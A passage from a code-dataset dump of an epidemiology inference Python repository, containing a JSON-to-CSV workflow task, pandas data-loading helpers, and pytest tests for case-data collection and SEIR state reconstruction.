"70659c8587db30e68207056b2763aab2a9ffec51", "content_id": "48d55120d16f6b61e1eba51c60d5dfe267661ecc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2244, "license_type": "no_license", "max_line_length": 128, "num_lines": 73, "path": "/epi_inference/formulations/inference_json2csv_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run', 'inference_json2csv']\n\nimport sys\nimport os.path\ntry:\n import ujson as json\nexcept:\n import json\nimport csv\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\n\ndef inference_json2csv(input_json, output_csv=None, datadir=None):\n if datadir:\n full_infile = os.path.join(datadir, input_json)\n else:\n full_infile = input_json\n if not os.path.exists(full_infile):\n raise RuntimeError(\"ERROR: Inference JSON file does not exist: \"+ full_infile)\n #\n print(\"Processing inference file: \"+full_infile)\n with open(full_infile,'r') as INPUT:\n raw = json.load(INPUT)\n\n # Figure out CSV output filename\n if output_csv:\n pass\n elif input_json.endswith('jsn'):\n output_csv = input_json[:-4]+\".csv\"\n elif input_json.endswith('json'):\n output_csv = input_json[:-5]+\".csv\"\n else:\n raise RuntimeError(\"ERROR: Cannot infer CSV output file name\")\n if datadir:\n full_outfile = os.path.join(datadir,output_csv)\n else:\n full_outfile = output_csv\n\n # Write CSV file\n print(\"Writing results summary: \"+full_outfile)\n with open(full_outfile,'w') as OUTPUT:\n sorted_fips = list(sorted(raw.keys()))\n OUTPUT.write(\"FIPS,Date,Beta,Status\\n\")\n for fips in sorted_fips:\n for d in range(len(raw[fips]['date'])):\n if raw[fips]['beta'][d] is None:\n OUTPUT.write('\"%s\",%s,,%s\\n' % (fips, raw[fips]['date'][d], raw[fips]['status'][d]))\n else:\n OUTPUT.write('\"%s\",%s,%f,%s\\n' % (fips, 
raw[fips]['date'][d], raw[fips]['beta'][d], raw[fips]['status'][d]))\n\n\ndef run(CONFIG, warnings):\n inference_json2csv(CONFIG['input_json'], output_csv=CONFIG.get('output_csv',None), datadir=CONFIG.get('datadir',None))\n\n\nclass Inference_JSON2CSV_Workflow(Task):\n\n def __init__(self):\n Task.__init__(self, \"inference_json2csv\",\n \"Convert inference JSON to CSV.\")\n\n def run(self, data, CONFIG):\n self._warnings = []\n run(CONFIG, self._warnings)\n\n def warnings(self):\n return self._warnings\n\n\nregister_task(Inference_JSON2CSV_Workflow())\n\n" }, { "alpha_fraction": 0.5433740615844727, "alphanum_fraction": 0.5526000261306763, "avg_line_length": 34.35593032836914, "blob_id": "889401857b3cfcb5f1a889d6b03674fe0f362c30", "content_id": "01a2d33ae36933e9eba4b7907172f6083ed037ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8346, "license_type": "no_license", "max_line_length": 160, "num_lines": 236, "path": "/epi_inference/collect/load_results.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "\nimport sys\nimport os\nimport pandas as pd\nimport glob\nimport importlib\n\n\n\"\"\"\nTODO - delete?\n\n\nprefix=\"around_md_sim_\"\n\ndef load_results(expdir=None, expnum=1, trial=0, county=\"24031\", threshold=0, start=0, stop=None, days_before_first=None, days_after_first=None, verbose=False):\n if verbose:\n print('load_results:', expdir, 'exp'+str(expnum), prefix+str(trial)+\"_scn_\"+county+\".csv\")\n filename=os.path.join(expdir, 'exp'+str(expnum), prefix+str(trial)+\"_scn_\"+county+\".csv\")\n if not os.path.exists(filename):\n print(\"MISSING FILE: \"+filename)\n print(\" Experiment \"+str(expnum))\n print(\" Trial \"+str(trial))\n print(\" County \"+county)\n return [], [], None\n\n df = pd.read_csv(filename) \n tmp = df.loc[ df['cumI'] >= threshold, ['cumI'] ]\n cumI = tmp['cumI'].tolist()\n index = list(range(len(cumI)))\n\n #\n # TODO - raise warning if both start/stop and days_after_first are specified\n #\n try:\n istart = cumI.index(next(filter(lambda x: x>0, cumI)))\n if not days_after_first is None:\n stop = min(len(cumI), istart + days_after_first)\n if not days_before_first is None:\n start = max(0, istart - days_before_first)\n except StopIteration:\n print(\"WARNING: no infections reported in the data. 
Ignoring days_after_first and days_before_first options.\")\n if stop is None or stop >= len(cumI):\n if start > 0:\n cumI = cumI[start:]\n index = index[start:]\n else:\n if start > 0:\n cumI = cumI[start:stop]\n index = index[start:stop]\n else:\n cumI = cumI[:stop]\n index = index[:stop]\n\n filename=os.path.join(expdir, 'exp'+str(expnum), \"README.txt\")\n with open(filename, \"r\") as INPUT:\n INPUT.readline()\n INPUT.readline()\n INPUT.readline()\n line = INPUT.readline()\n beta = line.strip().split(\" \")[2]\n line = INPUT.readline()\n line.strip()\n gamma = line.strip().split(\" \")[1]\n line = INPUT.readline()\n line.strip()\n sigma = line.strip().split(\" \")[1]\n return index, cumI, {'beta':beta, 'gamma':gamma, 'sigma':sigma}\n\"\"\"\n\n#\n# Load data files into a pandas dataframe\n#\ndef load_data(files, index_col=0, names=None, dtype=None, header=0, labels=None):\n if labels is None:\n labels = list(range(len(files)))\n if len(files) == 1:\n DF = pd.read_csv(files[0], header=header, dtype={\"FIPS\":'str'}, encoding=\"ISO-8859-1\")\n DF = DF.set_index(index_col)\n df = DF[names]\n df.index = df.index.rename('Date')\n if dtype == 'casedata':\n label = str(DF[\"FIPS\"][0])\n if len(label) < 5:\n label = \"0\"*(5-len(label))+label\n df = df.rename(columns={names[0]:label})\n else:\n label = str(labels[0])\n return df.rename(columns={names[0]:label})\n else:\n dfs = []\n i = 0\n for fname in files:\n DF = pd.read_csv(fname, header=header, dtype={\"FIPS\":'str'}, encoding=\"ISO-8859-1\")\n DF = DF.set_index(index_col)\n df = DF[names]\n if dtype == \"casedata\":\n label = str(DF[\"FIPS\"][0])\n if len(label) < 5:\n label = \"0\"*(5-len(label))+label\n else:\n label = str(labels[i])\n df = df.rename(columns={names[0]:label})\n df.index = df.index.rename('Date')\n dfs.append(df)\n i = i+1\n dfall = pd.concat(dfs, axis=1)\n dfall.index = dfall.index.rename('Date')\n return dfall\n \n\n#\n# Load data for one or more trials into a dataframe\n#\ndef load_df_expdata(expdir=None, expnum=1, trial=None, county=\"24031\", start=0, stop=None, days_before_first=None, days_after_first=None):\n #\n # load data\n #\n countycsvfiles = list(glob.glob(os.path.join(expdir, 'exp'+str(expnum), \"*_\"+county+\"*.csv\")))\n countycsvfiles.sort()\n if len(countycsvfiles) == 0: # pragma: no cover\n print(\"ERROR: no experimental files available for county '%s' in directory '%s'\" % (county, os.path.join(expdir, 'exp'+str(expnum))))\n return None, None\n if trial is None:\n df = load_data(countycsvfiles, dtype='seir', index_col='time', names=['cumI'])\n else:\n try:\n files = [countycsvfiles[trial]]\n except Exception as exc: # pragma: no cover\n print(\"ERROR: bad trial id '%s'\" % str(trial))\n print(exc)\n return None, None\n df = load_data(files, dtype='seir', index_col='time', names=['cumI'], labels=[trial])\n #print(df.head())\n #\n # filter data\n #\n cumI = df.sum(axis=1)\n #print(cumI)\n cumI = cumI.tolist()\n\n #\n # TODO - raise warning if both start/stop and days_after_first are specified\n #\n try:\n istart = cumI.index(next(filter(lambda x: x>0, cumI)))\n if not days_after_first is None:\n stop = min(len(cumI), istart + days_after_first+1)\n if not days_before_first is None:\n start = max(0, istart - days_before_first)\n except StopIteration: # pragma: no cover\n print(\"WARNING: no infections reported in the data. 
Ignoring days_after_first and days_before_first options.\")\n if stop is None or stop >= len(cumI):\n if start > 0:\n df = df.iloc[start:,]\n else:\n if start > 0:\n df = df.iloc[start:stop,]\n else:\n df = df.iloc[:stop,]\n\n filename=os.path.join(expdir, 'exp'+str(expnum), \"README.txt\")\n if os.path.exists(filename):\n with open(filename, \"r\") as INPUT:\n INPUT.readline()\n INPUT.readline()\n INPUT.readline()\n line = INPUT.readline()\n beta = line.strip().split(\" \")[2]\n line = INPUT.readline()\n line.strip()\n gamma = line.strip().split(\" \")[1]\n line = INPUT.readline()\n line.strip()\n sigma = line.strip().split(\" \")[1]\n R0 = str(float(beta)/float(gamma))\n else:\n modulepath=os.path.join(expdir, 'exp'+str(expnum))\n sys.path.insert(0, modulepath)\n importlib.invalidate_caches()\n module = importlib.import_module('info')\n module = importlib.reload(module)\n sys.path.pop(0)\n beta = str(module.beta)\n gamma = str(module.gamma)\n R0 = str(module.R0)\n sigma = str(module.sigma)\n return df, {'beta':float(beta), 'R0':float(R0), 'gamma':float(gamma), 'sigma':float(sigma)}\n\n\n#\n# Load data for one or more trials into a dataframe\n#\ndef load_df_casedata(files, datadir=None, datacol=None, start=0, stop=None, days_before_first=None, days_after_first=None):\n if datacol is None:\n datacol='Confirmed'\n #\n # load data\n #\n files.sort()\n if len(files) == 0: # pragma: no cover\n print(\"ERROR: no case data files were specified\")\n return None\n files_with_path = []\n for f in files:\n fname = os.path.join(datadir, f)\n if not os.path.exists(fname): # pragma: no cover\n print(\"ERROR: missing file '%s' in directory '%s'\" % (f, datadir))\n return None\n files_with_path.append(fname)\n df = load_data(files_with_path, dtype='casedata', index_col=\"Date\", names=[datacol])\n #\n # filter data\n #\n cumI = df.sum(axis=1)\n #print(cumI)\n cumI = cumI.tolist()\n\n #\n # TODO - raise warning if both start/stop and days_after_first are specified\n #\n try:\n istart = cumI.index(next(filter(lambda x: x>0, cumI)))\n if not days_after_first is None:\n stop = min(len(cumI), istart + days_after_first+1)\n if not days_before_first is None:\n start = max(0, istart - days_before_first)\n except StopIteration: # pragma: no cover\n print(\"WARNING: no infections reported in the data. 
Ignoring days_after_first and days_before_first options.\")\n if stop is None or stop >= len(cumI):\n if start > 0:\n df = df.iloc[start:,]\n else:\n if start > 0:\n df = df.iloc[start:stop,]\n else:\n df = df.iloc[:stop,]\n return df\n\n" }, { "alpha_fraction": 0.6027931571006775, "alphanum_fraction": 0.6455124020576477, "avg_line_length": 47.689998626708984, "blob_id": "7805bf1617a3500443705af7b5f83ba2a36d78a2", "content_id": "66969d7aece5cb2f2b49b246a51c174bae88123a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4869, "license_type": "no_license", "max_line_length": 154, "num_lines": 100, "path": "/epi_inference/collect/tests/test_collect_workflows.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport os\nimport os.path\nimport shutil\nfrom pyomo.common import fileutils as fileutils\nfrom pyutilib.misc import Options as Options\n\nfrom epi_inference.util import compare_csv\nfrom epi_inference.engine import driver\n\n\nclass TestCollect():\n @classmethod\n def setup_class(cls):\n cls._origdir = os.getcwd()\n thisfiledir = fileutils.this_file_dir()\n os.chdir(thisfiledir)\n\n @classmethod\n def teardown_class(cls):\n os.chdir(cls._origdir)\n\n def test_collect_exp(self):\n # run a collection of data for 24031\n args = Options()\n args.block = 'collect'\n args.config_file = './config_files/collect_exp.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the csv files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_csv('./output/expdata3_1_all.csv', './baseline/expdata3_1_all.csv', index_col='Date')\n assert outputdf.shape[0] == 123\n outputdf, golddf = compare_csv('./output/expdata3_2_all.csv', './baseline/expdata3_2_all.csv', index_col='Date')\n assert outputdf.shape[0] == 123\n outputdf, golddf = compare_csv('./output/expdata3_3_all.csv', './baseline/expdata3_3_all.csv', index_col='Date')\n assert outputdf.shape[0] == 123\n outputdf, golddf = compare_csv('./output/expdata3_1_7before.csv', './baseline/expdata3_1_7before.csv', index_col='Date')\n assert outputdf.shape[0] == 123\n outputdf, golddf = compare_csv('./output/expdata3_1_15after.csv', './baseline/expdata3_1_15after.csv', index_col='Date')\n assert outputdf.shape[0] == 17\n compare_csv('./output/expdata3_1_7before_15after.csv', './baseline/expdata3_1_7before_15after.csv', index_col='Date')\n \n outputdf, golddf = compare_csv('./output/expdata3_1_col3_7before.csv', './baseline/expdata3_1_col3_7before.csv', index_col='Date')\n assert outputdf.shape[0] == 120\n outputdf, golddf = compare_csv('./output/expdata3_1_col3_15after.csv', './baseline/expdata3_1_col3_15after.csv', index_col='Date')\n assert outputdf.shape[0] == 26\n outputdf, golddf = compare_csv('./output/expdata3_1_col3_7before_15after.csv', './baseline/expdata3_1_col3_7before_15after.csv', index_col='Date')\n assert outputdf.shape[0] == 23\n \n # cleanup the files we created\n os.remove('./output/expdata3_1_all.csv')\n os.remove('./output/expdata3_1_all_meta.yml')\n os.remove('./output/expdata3_1_all_geodata.csv')\n os.remove('./output/expdata3_2_all.csv')\n os.remove('./output/expdata3_2_all_meta.yml')\n os.remove('./output/expdata3_2_all_geodata.csv')\n os.remove('./output/expdata3_3_all.csv')\n os.remove('./output/expdata3_3_all_meta.yml')\n os.remove('./output/expdata3_3_all_geodata.csv')\n os.remove('./output/expdata3_1_7before.csv')\n os.remove('./output/expdata3_1_7before_meta.yml')\n 
os.remove('./output/expdata3_1_7before_geodata.csv')\n os.remove('./output/expdata3_1_15after.csv')\n os.remove('./output/expdata3_1_15after_meta.yml')\n os.remove('./output/expdata3_1_15after_geodata.csv')\n os.remove('./output/expdata3_1_7before_15after.csv')\n os.remove('./output/expdata3_1_7before_15after_meta.yml')\n os.remove('./output/expdata3_1_7before_15after_geodata.csv')\n os.remove('./output/expdata3_1_col3_7before.csv')\n os.remove('./output/expdata3_1_col3_7before_meta.yml')\n os.remove('./output/expdata3_1_col3_7before_geodata.csv')\n os.remove('./output/expdata3_1_col3_15after.csv')\n os.remove('./output/expdata3_1_col3_15after_meta.yml')\n os.remove('./output/expdata3_1_col3_15after_geodata.csv')\n os.remove('./output/expdata3_1_col3_7before_15after.csv')\n os.remove('./output/expdata3_1_col3_7before_15after_meta.yml')\n os.remove('./output/expdata3_1_col3_7before_15after_geodata.csv')\n \n # check that we cleaned everything up\n #files_remaining = [f for f in os.listdir('./output')]\n #assert len(files_remaining) == 0\n \n def test_collect_case(self):\n args = Options()\n args.block = 'collect'\n args.config_file = './config_files/collect_case.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the csv files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_csv('./output/countydata1_FL.csv', './baseline/countydata1_FL.csv', index_col='Date')\n assert outputdf.shape[0] == 40\n\n os.remove('./output/countydata1_FL.csv')\n os.remove('./output/countydata1_FL_meta.yml')\n\n # check that we cleaned everything up\n #files_remaining = [f for f in os.listdir('./output')]\n #assert len(files_remaining) == 0\n" }, { "alpha_fraction": 0.5760652422904968, "alphanum_fraction": 0.5977146029472351, "avg_line_length": 46.55155563354492, "blob_id": "92f2c76f2b35f21fc9a133d618f3080a5d226265", "content_id": "86fd3b451a225c2d244617b1b2cd2d899b411975", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 29054, "license_type": "no_license", "max_line_length": 147, "num_lines": 611, "path": "/epi_inference/reconstruction/tests/test_reconstruction.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport pandas as pd\npd.set_option(\"display.max_rows\", None)\nimport numpy as np\nfrom datetime import datetime, timedelta\nimport epi_inference.reconstruction.common as rcommon\nimport epi_inference.reconstruction.deterministic as recond\nimport epi_inference.reconstruction.stochastic as recons\nfrom epi_inference.simulation.simulation import simulate_discrete_seiiir_deterministic\nfrom epi_inference.util import roundall\nimport matplotlib.pyplot as plt\n\n\"\"\"\ndef test_force_keyword_args():\n @force_keyword_args\n def func(a,b):\n return '{}{}'.format(a,b)\n\n ans = func(a='A', b='B')\n assert ans == 'AB'\n\n with pytest.Raises(SyntaxError):\n func('A','B')\n\"\"\"\n\n#ToDo: switch the np stochastic reconstruction test to use simulated data from pipeline with our reporting model\n\ndef test_reported_cases_from_cumulative():\n # test handling of all zeros and that dates are correct\n dates = pd.date_range(end=datetime(year=2020, month=4, day=12), periods=4).to_pydatetime().tolist()\n assert dates[0] == datetime(year=2020, month=4, day=9)\n \n cc = [0, 0, 0, 0] \n reported_cases_per_day \\\n = rcommon.reported_cases_from_cumulative(dates=dates,\n cumulative_reported_cases=cc)\n \n assert len(reported_cases_per_day.values) == len(cc)-1\n assert 
len(reported_cases_per_day.values) == 3\n assert len(reported_cases_per_day.dates) == len(dates)-1\n assert len(reported_cases_per_day.dates) == 3\n assert all(r == 0 for r in reported_cases_per_day.values)\n assert reported_cases_per_day.dates[0] == datetime(year=2020, month=4, day=10)\n expected_rc = [0, 0, 0]\n assert all([r == er for r, er in zip(reported_cases_per_day.values, expected_rc)])\n\n # test that we obtain expected numbers\n dates = pd.date_range(end=datetime(year=2020, month=4, day=3), periods=7).to_pydatetime().tolist()\n assert dates[0] == datetime(year=2020, month=3, day=28)\n cc = [0, 1, 2, 3, 3, 3, 5]\n reported_cases_per_day = \\\n rcommon.reported_cases_from_cumulative(dates=dates,\n cumulative_reported_cases=cc)\n assert len(reported_cases_per_day.dates) == 6\n assert len(reported_cases_per_day.values) == 6\n expected_rc = [1, 1, 1, 0, 0, 2]\n assert all([r == er for r,er in zip(reported_cases_per_day.values, expected_rc)])\n assert reported_cases_per_day.dates[0] == datetime(year=2020, month=3, day=29)\n assert reported_cases_per_day.dates[-1] == datetime(year=2020, month=4, day=3)\n\n # test that we throw an error if dates are not the same length as cumulative reported cases\n dates = pd.date_range(end=datetime(year=2020, month=4, day=3), periods=5).to_pydatetime().tolist()\n cc = [0, 1, 2, 3, 3, 3, 5]\n with pytest.raises(ValueError):\n reported_cases_per_day = \\\n rcommon.reported_cases_from_cumulative(dates=dates,\n cumulative_reported_cases=cc)\n\n # test that we throw an error if cumulative reported cases does\n # not start at zero\n dates = pd.date_range(end=datetime(year=2020, month=4, day=3), periods=4).to_pydatetime().tolist()\n cc = [4, 5, 6, 7]\n with pytest.raises(ValueError):\n reported_cases_per_day = \\\n rcommon.reported_cases_from_cumulative(dates=dates,\n cumulative_reported_cases=cc)\n\n # that that we throw an error if cumulative cases are non-increasing\n dates = pd.date_range(end=datetime(year=2020, month=4, day=3), periods=5).to_pydatetime().tolist()\n cc = [0, 1, 2, 1, 5]\n with pytest.raises(ValueError):\n reported_cases_per_day = \\\n rcommon.reported_cases_from_cumulative(dates=dates,\n cumulative_reported_cases=cc)\n\ndef test_df_reported_cases_from_cumulative():\n # test handling of all zeros and that dates are correct\n dates = pd.date_range(end=datetime(year=2020, month=4, day=12), periods=4).to_pydatetime().tolist()\n assert dates[0] == datetime(year=2020, month=4, day=9)\n\n counties = ['12001', '12002', '12003']\n\n cumulative_reported_cases = dict()\n for i,c in enumerate(counties):\n cumulative_reported_cases[c] = [i*j for j in range(4)]\n\n cumulative_reported_cases['date'] = dates\n df_cumulative_reported_cases = pd.DataFrame(cumulative_reported_cases)\n\n df_reported_cases = rcommon.df_reported_cases_from_cumulative(df_cumulative_reported_cases)\n\n # test that we obtain the expected numbers\n reported_cases = dict()\n reported_cases['date'] = dates[1:]\n for i,c in enumerate(counties):\n reported_cases[c] = [i for j in range(3)]\n df_expected_reported_cases = pd.DataFrame(reported_cases).set_index('date')\n pd.testing.assert_frame_equal(df_reported_cases, df_expected_reported_cases.astype(float))\n\n # test that we throw an error if cumulative reported cases does\n # not start at zero\n cumulative_reported_cases = dict()\n for i,c in enumerate(['12001', '12002', '12003']):\n cumulative_reported_cases[c] = [i*j+1 for j in range(4)]\n\n cumulative_reported_cases['date'] = dates\n df_cumulative_reported_cases = 
pd.DataFrame(cumulative_reported_cases)\n\n with pytest.raises(ValueError):\n df_reported_cases = rcommon.df_reported_cases_from_cumulative(df_cumulative_reported_cases)\n\n # test that we throw an error if cumulative reported have decreasing\n # numbers\n cumulative_reported_cases = dict()\n for i,c in enumerate(['12001', '12002', '12003']):\n cumulative_reported_cases[c] = [i*j for j in range(4)]\n cumulative_reported_cases['12003'][2]=1\n\n cumulative_reported_cases['date'] = dates\n df_cumulative_reported_cases = pd.DataFrame(cumulative_reported_cases)\n\n with pytest.raises(ValueError):\n df_reported_cases = rcommon.df_reported_cases_from_cumulative(df_cumulative_reported_cases)\n\n \"\"\"\n # test that we throw an error if dates are not the same length as cumulative reported cases\n dates = pd.date_range(end=datetime(year=2020, month=4, day=3), periods=5).to_pydatetime().tolist()\n cc = [0, 1, 2, 3, 3, 3, 5]\n with pytest.raises(ValueError):\n rdates, rc = rcommon.reported_cases_from_cumulative(dates, cc)\n \"\"\"\n\ndef test_np_reported_cases_from_cumulative():\n # test handling of all zeros and that dates are correct\n dates = np.arange(datetime(2020,1,1), datetime(2020,1,5), timedelta(days=1)).astype(datetime)\n counties = np.asarray(['12001', '12002', '12003']).astype(object)\n\n cumulative_reported_cases = np.zeros((len(dates), len(counties)))\n for i,c in enumerate(counties):\n cumulative_reported_cases[:,i] = np.asarray([i*j for j in range(4)])\n\n reported_cases_per_day = \\\n rcommon.np_reported_cases_from_cumulative(dates=dates,\n counties=counties,\n cumulative_reported_cases=cumulative_reported_cases)\n \n # test that we obtain the expected numbers\n np.testing.assert_array_equal(reported_cases_per_day.dates,dates[1:])\n np.testing.assert_array_equal(reported_cases_per_day.counties,counties)\n np_expected_reported_cases = np.zeros((len(reported_cases_per_day.dates), len(counties)))\n for i,c in enumerate(counties):\n np_expected_reported_cases[:,i] = np.asarray([i for j in range(3)])\n np.testing.assert_array_equal(reported_cases_per_day.values, np_expected_reported_cases)\n\n # test that we throw an error if dates are not the same length as cumulative reported cases\n with pytest.raises(ValueError):\n reported_cases_per_day = \\\n rcommon.np_reported_cases_from_cumulative(dates=dates[2:],\n counties=counties,\n cumulative_reported_cases=cumulative_reported_cases)\n\n # test that we throw an error if cumulative reported cases do\n # not start at zero\n cumulative_reported_cases = np.zeros((len(dates), len(counties)))\n for i,c in enumerate(counties):\n cumulative_reported_cases[:,i] = np.asarray([i*j+1 for j in range(4)])\n\n with pytest.raises(ValueError):\n reported_cases_per_day = \\\n rcommon.np_reported_cases_from_cumulative(dates=dates[2:],\n counties=counties,\n cumulative_reported_cases=cumulative_reported_cases)\n\n # test that we throw an error if cumulative reported have decreasing\n # numbers\n cumulative_reported_cases = np.zeros((len(dates), len(counties)))\n for i,c in enumerate(counties):\n cumulative_reported_cases[:,i] = np.asarray([i*j for j in range(4)])\n cumulative_reported_cases[2,2]=1\n\n with pytest.raises(ValueError):\n reported_cases_per_day = \\\n rcommon.np_reported_cases_from_cumulative(dates=dates,\n counties=counties,\n cumulative_reported_cases=cumulative_reported_cases)\n\ndef test_transmissions_from_reported_cases():\n # run a simulation and test that we recover the transmission\n # vector from the cumulative reported cases\n N = 1000\n 
y0={'S': N, 'E': 5, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5.2\n gamma = 1/4\n beta = 2.2*gamma\n reporting_factor = 8\n report_delay = 7\n tf=100\n \n sim = simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, reporting_factor, N, report_delay, tx=None)\n SEIIIR = sim.SEIIIR\n\n reported_cases_per_day = rcommon.reported_cases_from_cumulative(dates=sim.cumulative_reported_cases.dates,\n cumulative_reported_cases=sim.cumulative_reported_cases.values\n )\n\n assert len(reported_cases_per_day.dates) == len(sim.cumulative_reported_cases.dates)-1\n assert len(reported_cases_per_day.dates) == len(sim.SEIIIR.dates)\n assert len(reported_cases_per_day.values) == len(sim.cumulative_reported_cases.values)-1\n \n transmissions = recond._transmissions_from_reported_cases(dates=reported_cases_per_day.dates,\n reported_cases_per_day=reported_cases_per_day.values,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n assert len(transmissions.dates) == len(reported_cases_per_day.dates)\n assert len(transmissions.values) == len(reported_cases_per_day.values)\n \n np.testing.assert_allclose(np.asarray(SEIIIR.transmissions), np.asarray(transmissions.values))\n for i in range(len(transmissions.dates)):\n assert transmissions.dates[i] == SEIIIR.dates[i]\n\ndef test_np_deterministic():\n # run some simulations and test that we recover the transmissions\n # from the cumulative reported cases\n N = 1000\n sigma = 1/5.2\n gamma = 1/4\n beta = 2.2*gamma\n reporting_factor = 8\n report_delay = 7\n tf=100\n tx=[0]*tf\n tx[30]=1\n\n counties = np.asarray(['12001', '12002', '12003'], dtype=np.object)\n populations = np.zeros(len(counties))\n cumulative_reported_cases = np.zeros((tf+1,len(counties)))\n simT = np.zeros((tf,len(counties)))\n simS = np.zeros((tf,len(counties)))\n simE = np.zeros((tf,len(counties)))\n simI1 = np.zeros((tf,len(counties)))\n simI2 = np.zeros((tf,len(counties)))\n simI3 = np.zeros((tf,len(counties)))\n simR = np.zeros((tf,len(counties)))\n for i,c in enumerate(counties):\n y0={'S': N*(i+1), 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n populations[i] = N*(i+1)\n sim = simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, reporting_factor, populations[i], report_delay, tx=tx)\n cumulative_reported_cases[:,i] = sim.cumulative_reported_cases.values\n simT[:,i] = sim.SEIIIR.transmissions\n simS[:,i] = sim.SEIIIR.S\n simE[:,i] = sim.SEIIIR.E\n simI1[:,i] = sim.SEIIIR.I1\n simI2[:,i] = sim.SEIIIR.I2\n simI3[:,i] = sim.SEIIIR.I3\n simR[:,i] = sim.SEIIIR.R\n cumulative_reported_cases_dates = np.asarray(sim.cumulative_reported_cases.dates)\n dates = np.asarray(sim.SEIIIR.dates)\n\n reported_cases_per_day = \\\n rcommon.np_reported_cases_from_cumulative(dates=cumulative_reported_cases_dates,\n counties=counties,\n cumulative_reported_cases=cumulative_reported_cases)\n\n assert len(reported_cases_per_day.dates) == len(cumulative_reported_cases_dates)-1\n assert len(reported_cases_per_day.dates) == len(dates)\n assert len(reported_cases_per_day.values) == len(dates)\n np.testing.assert_array_equal(reported_cases_per_day.dates, cumulative_reported_cases_dates[1:])\n np.testing.assert_array_equal(reported_cases_per_day.counties, counties)\n\n ### test the intermediate method\n transmissions = recond._np_transmissions_from_reported_cases(dates=reported_cases_per_day.dates,\n counties=reported_cases_per_day.counties,\n reported_cases_per_day=reported_cases_per_day.values,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n assert 
len(transmissions.dates) == len(reported_cases_per_day.dates)\n assert reported_cases_per_day.values.shape == transmissions.values.shape\n \n np.testing.assert_allclose(simT, transmissions.values)\n np.testing.assert_array_equal(transmissions.dates, dates)\n\n ### test the reconstruction\n recon = recond.np_reconstruct_states_deterministic_decay(dates=reported_cases_per_day.dates,\n counties=reported_cases_per_day.counties,\n reported_cases_per_day=reported_cases_per_day.values,\n populations=populations,\n sigma=sigma,\n gamma=gamma,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n\n np.testing.assert_array_equal(dates, recon.dates)\n np.testing.assert_array_almost_equal(simS,recon.S)\n np.testing.assert_array_almost_equal(simE,recon.E)\n np.testing.assert_array_almost_equal(simI1,recon.I1)\n np.testing.assert_array_almost_equal(simI2,recon.I2)\n np.testing.assert_array_almost_equal(simI3,recon.I3)\n np.testing.assert_array_almost_equal(simR,recon.R)\n\ndef test_reconstruct_states_deterministic_decay():\n # run a simulation and test that we reconstruct the states\n # from the cumulative reported cases\n N = 1000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5.2\n gamma = 1/4\n beta = 2.2*gamma\n reporting_factor = 8\n report_delay = 7\n tf=100\n tx=[0]*tf\n tx[10] = 1\n \n # run the simulation\n sim = simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, reporting_factor, N, report_delay, tx=tx)\n SEIIIR = sim.SEIIIR\n\n # reconstruct the states\n reported_cases_per_day = rcommon.reported_cases_from_cumulative(dates=sim.cumulative_reported_cases.dates,\n cumulative_reported_cases=sim.cumulative_reported_cases.values)\n \n recon = recond.reconstruct_states_deterministic_decay(dates=reported_cases_per_day.dates,\n reported_cases_per_day=reported_cases_per_day.values,\n population=N, sigma=sigma,\n gamma=gamma, reporting_factor=reporting_factor,\n report_delay=report_delay)\n\n assert len(reported_cases_per_day.dates) == len(sim.SEIIIR.dates)\n assert len(recon.dates) == len(sim.SEIIIR.dates)\n assert len(reported_cases_per_day.values) == len(sim.SEIIIR.dates)\n assert len(recon.transmissions) == len(sim.SEIIIR.transmissions)\n assert len(recon.S) == len(SEIIIR.S)\n assert len(recon.E) == len(SEIIIR.E)\n assert len(recon.I1) == len(SEIIIR.I1)\n assert len(recon.I2) == len(SEIIIR.I2)\n assert len(recon.I3) == len(SEIIIR.I3)\n assert len(recon.R) == len(SEIIIR.R)\n\n np.testing.assert_allclose(np.asarray(SEIIIR.transmissions), np.asarray(recon.transmissions))\n np.testing.assert_allclose(np.asarray(SEIIIR.S), np.asarray(recon.S))\n np.testing.assert_allclose(np.asarray(SEIIIR.E), np.asarray(recon.E))\n np.testing.assert_allclose(np.asarray(SEIIIR.I1), np.asarray(recon.I1))\n np.testing.assert_allclose(np.asarray(SEIIIR.I2), np.asarray(recon.I2))\n np.testing.assert_allclose(np.asarray(SEIIIR.I3), np.asarray(recon.I3))\n np.testing.assert_allclose(np.asarray(SEIIIR.R), np.asarray(recon.R))\n\n for i in range(len(recon.dates)):\n assert recon.dates[i] == SEIIIR.dates[i]\n\n for i in range(len(reported_cases_per_day.dates)):\n assert reported_cases_per_day.dates[i] == sim.cumulative_reported_cases.dates[i+1]\n\ndef test_stochastic_reconstruction():\n # run a simulation and test that we reconstruct the states\n # from the cumulative reported cases\n N = 1000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5.2\n gamma = 1/4.3\n beta = 2.2*gamma\n reporting_factor = 10\n report_delay = 8\n tf=100\n tx=[0]*tf\n tx[10] = 1\n 
